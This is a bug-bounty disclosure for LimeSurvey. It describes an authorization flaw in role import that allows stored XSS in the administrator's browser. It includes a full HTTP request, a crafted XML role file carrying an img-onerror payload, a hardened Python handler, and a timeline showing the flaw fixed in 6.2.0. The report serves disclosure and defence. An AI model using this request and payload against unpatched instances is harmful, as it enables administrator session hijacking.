Incorrect Authorization to Stored XSS in Import User Role function in limesurvey/limesurvey

Valid

Reported on

Jun 28th 2023


Description

The application does not correctly check user permissions on the 'import user roles' function, so an attacker without any specific privilege can import a role file whose name field carries a payload that executes JavaScript in the administrator's browser.

Proof of Concept

Step 1: Even without the privilege to manage roles, the attacker sends a POST request to /index.php?r=userRole/importXML and is still able to import roles. The import file carries the payload inside the <name> tag.

Payload:

testxss&#39;&quot;&gt;&lt;img src/onerror=alert(document.domain)&gt;

Request:

POST /index.php?r=userRole/importXML HTTP/2
Host: demo.limesurvey.org
Cookie: PHPSESSID=1i9laa7dd5it7dek1ck7dspjh9; YII_CSRF_TOKEN=hacker
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33017625507619580921250154105
Content-Length: 2524
Origin: https://demo.limesurvey.org
Dnt: 1
Referer: https://demo.limesurvey.org/index.php?r=userRole/index
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------33017625507619580921250154105
Content-Disposition: form-data; name="YII_CSRF_TOKEN"

hacker
-----------------------------33017625507619580921250154105
Content-Disposition: form-data; name="the_file"; filename="test.xml"
Content-Type: text/xml

<?xml version="1.0"?>
<limepermissionrole><meta><name>&lt;![CDATA[testxss&#39;&quot;&gt;&lt;img src/onerror=alert(document.domain)&gt;]]&gt;</name><description>&lt;![CDATA[test]]&gt;</description><date>2023-06-28 18:45:37</date><createdOn>LimeSurvey</createdOn><createdBy>1</createdBy></meta><permissions><participantpanel><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></participantpanel><labelsets><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></labelsets><settings><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></settings><surveysgroups><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></surveysgroups><surveys><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></surveys><templates><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></templates><usergroups><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></usergroups><users><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></users><superadmin><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></superadmin><auth_db><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></auth_db></permissions></limepermissionrole>

-----------------------------33017625507619580921250154105--


Step 2: The administrator navigates to the role management function, and the JavaScript payload is triggered.


Impact

The attacker can import a user role containing a payload that executes JavaScript code in the administrator's browser and hijacks the administrator's session cookie.
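The report names two defects: the import endpoint runs without an authorization check, and the imported role name is later rendered as markup. The following is an added example (not LimeSurvey's code) showing a hardened handler for the role-import format from the PoC: the permission is enforced before the upload is parsed, and the name is HTML-encoded at render time. The permission name `users:import` and the in-memory store are assumptions for the demonstration.

```python
import html
import xml.etree.ElementTree as ET

# Constructed sample: the role-import file from the report, trimmed to the
# <meta> block (the <permissions> block is irrelevant to the two defects shown).
SAMPLE_IMPORT = b"""<?xml version="1.0"?>
<limepermissionrole><meta>
<name>&lt;![CDATA[testxss&#39;&quot;&gt;&lt;img src/onerror=alert(document.domain)&gt;]]&gt;</name>
<description>&lt;![CDATA[test]]&gt;</description>
</meta><permissions/></limepermissionrole>"""

# Hypothetical permission name; LimeSurvey's real permission model is not on the page.
IMPORT_ROLE_PERMISSION = "users:import"


def parse_role_name(xml_bytes: bytes) -> str:
    """Return the role name as plain text. The export file entity-encodes a CDATA
    wrapper, so after XML parsing the name still carries '<![CDATA[' ... ']]>'."""
    # For real uploads prefer defusedxml, which refuses entity-expansion attacks.
    root = ET.fromstring(xml_bytes)
    if root.tag != "limepermissionrole":
        raise ValueError("not a LimeSurvey role export")
    name = root.findtext("meta/name", default="")
    if name.startswith("<![CDATA[") and name.endswith("]]>"):
        name = name[len("<![CDATA["):-len("]]>")]
    return name


def import_role(user_permissions: set, xml_bytes: bytes, store: dict) -> str:
    """Hardened handler: refuse before touching the upload unless the caller
    holds the import permission (the check the report says was missing)."""
    if IMPORT_ROLE_PERMISSION not in user_permissions:
        raise PermissionError("importing user roles requires " + IMPORT_ROLE_PERMISSION)
    name = parse_role_name(xml_bytes)
    store[name] = xml_bytes  # stored verbatim; encoding belongs at the output step
    return name


def render_role_row(name: str) -> str:
    """Context-aware output encoding for the role list: this is what keeps a
    stored name from becoming markup when the administrator opens the page."""
    return "<td>" + html.escape(name, quote=True) + "</td>"
```

An unprivileged caller is rejected before the XML is parsed, and a privileged import of the PoC file yields a row in which the `<img>` tag survives only as inert text.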

We are processing your report and will contact the limesurvey team within 24 hours. 5 months ago
We have contacted a member of the limesurvey team and are waiting to hear back 5 months ago
tiborpacalat
4 months ago

Maintainer


Internal tracking code: 18967

tiborpacalat validated this vulnerability 4 months ago
aqngoc has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
tiborpacalat marked this as fixed in 6.2.0+230732 with commit e4ce83 4 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
tiborpacalat published this vulnerability 4 months ago